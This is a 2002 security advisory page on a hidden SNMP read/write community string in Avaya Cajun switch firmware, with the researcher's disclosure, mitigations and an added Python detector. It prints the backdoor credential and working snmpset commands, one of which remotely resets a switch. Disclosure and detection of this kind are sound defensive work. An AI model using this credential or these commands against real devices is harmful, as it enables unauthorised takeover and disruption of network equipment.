SecurityTracker.com
Category:   Device (Router/Bridge/Hub)  >   Cajun Network Switches
Vendors:   Avaya
Avaya Cajun Switch Undocumented SNMP Community String Lets Remote Users Administer the Device
SecurityTracker Alert ID:  1004949
SecurityTracker URL:  http://securitytracker.com/id/1004949
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 6 2002
Impact:   Disclosure of system information, Modification of system information, Root access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): P330T, P333R, P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS) and possibly other models
Description:   A vulnerability was reported in the Avaya Cajun series of network switches. A remote user can gain administrative control via SNMP.

It is reported that various Cajun firmware versions contain an undocumented community read/write string:

NoGaH$@!

A remote user can use the string to obtain administrative control of the system. Some demonstration exploit strings are provided:

sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = AsnNull
sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello there :)'
system.sysName.0 = Hello there :)
sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = Hello there :)

The following demonstration exploit to reset the device is provided:

sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1
enterprises.81.7.7.0 = 1

Impact:   A remote user can administer the device via SNMP.
Solution:   The vendor has released a fixed version, available at:

http://support.avaya.com

Vendor URL:  www1.avaya.com/enterprise/who/docs/product12.html
Cause:   Authentication error

Message History:   None.


 Source Message Contents

Subject:  SNMP vulnerability in AVAYA Cajun firmware


1. Problem Description

There exists an undocumented SNMP r/w community string in firmware for
Avaya Cajun P33x series hardware. This allows anyone having SNMP access to
the device to administer it.

2. Tested systems

The following versions were tested and found vulnerable:

Avaya Cajun P330T software version 3.8.2 and 3.9.1
Avaya Cajun P333R software version 3.8.1 and 3.9.1

Additionally, firmware for P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS)
was found to be vulnerable.


3. Details

Various Cajun firmware contains an undocumented community r/w string NoGaH$@!
To test try:

sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = AsnNull
sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello there :)'
system.sysName.0 = Hello there :)
sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0
system.sysName.0 = Hello there :)

Reset a Cajun switch remotely (fun party trick):

sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1
enterprises.81.7.7.0 = 1


4. Recommendations

As always it is good administrative practice to block SNMP at the
firewall, especially now after the release of the PROTOS SNMP testing
suite. However, the vulnerability is also present on P333R router
interfaces, which have a higher chance of being exposed to the outside
world:

sq5bpf@hash:~$ snmpget 192.168.0.4 'NoGaH$@!' system.sysDescr.0
system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4

If for some reason the user is unable to upgrade to a fixed version, in
order to mitigate the bug one can restrict SNMP access using the
'set allowed managers' command, which appeared in recent Cajun firmware.


5. Vendor status

AVAYA was informed on 27 May 2002. The vendor responded on May 28 2002. As
the vendor proved responsive and worked promptly on the problem, I have
agreed to release the information after the release of fixed software. The
fixed software has been released on July 4, and is available from the
Avaya support site http://support.avaya.com. Official AVAYA security
advisories are located at http://support.avaya.com/security/


6. Disclaimer

Neither I nor my employer is responsible for the use or misuse of
information in this advisory.  The opinions expressed are my own and not
of any company.  Any use of the information is at the user's own risk.


Jacek Lipkowski sq5bpf@andra.com.pl

Andra Co. Ltd.
ul Wynalazek 6
02-677 Warsaw, Poland
http://www.andra.com.pl
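
A detection-side companion to the advisory, added here as an example and not code from the advisory, its author or Avaya: it decodes the SNMPv1/v2c header of a UDP/161 payload and flags any datagram that carries the undocumented community string, reporting whether it was a read or a write. The function names and the constructed sample datagrams (valid header, empty PDU body) are assumptions made for illustration.

```python
# Added example: flag SNMPv1/v2c datagrams that carry the undocumented community.
BACKDOOR = b"NoGaH$@!"          # community string quoted in the advisory
PDU_NAMES = {0xA0: "get", 0xA1: "getnext", 0xA2: "response", 0xA3: "set"}

def _tlv(buf, pos):
    """Decode one BER TLV at pos; return (tag, value, next_pos)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low bits = count of length octets
        n = length & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("value runs past end of datagram")
    return tag, buf[pos:pos + length], pos + length

def inspect(datagram):
    """Return (community, pdu_name, alert) for a UDP/161 payload, or None if not SNMPv1/v2c."""
    try:
        tag, body, _ = _tlv(datagram, 0)
        if tag != 0x30:                    # outer SEQUENCE
            return None
        tag, version, pos = _tlv(body, 0)
        if tag != 0x02 or version not in (b"\x00", b"\x01"):   # v1 = 0, v2c = 1
            return None
        tag, community, pos = _tlv(body, pos)
        if tag != 0x04 or pos >= len(body):                    # OCTET STRING, then a PDU
            return None
    except ValueError:
        return None
    pdu = PDU_NAMES.get(body[pos], "other")
    return community, pdu, community == BACKDOOR

def _sample(community, pdu_tag):
    """Constructed test datagram: valid header, empty PDU body (not a usable request)."""
    body = b"\x02\x01\x00" + bytes([0x04, len(community)]) + community + bytes([pdu_tag, 0])
    return bytes([0x30, len(body)]) + body

# Constructed samples: ordinary read, backdoor read, backdoor write.
SAMPLES = [_sample(b"public", 0xA0), _sample(BACKDOOR, 0xA0), _sample(BACKDOOR, 0xA3)]

if __name__ == "__main__":
    for d in SAMPLES:
        print(inspect(d))
```

An alert on a "set" PDU is the higher-priority case, since the advisory shows writes changing sysName and resetting the switch.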



 
 



Copyright 2019, SecurityGlobal.net LLC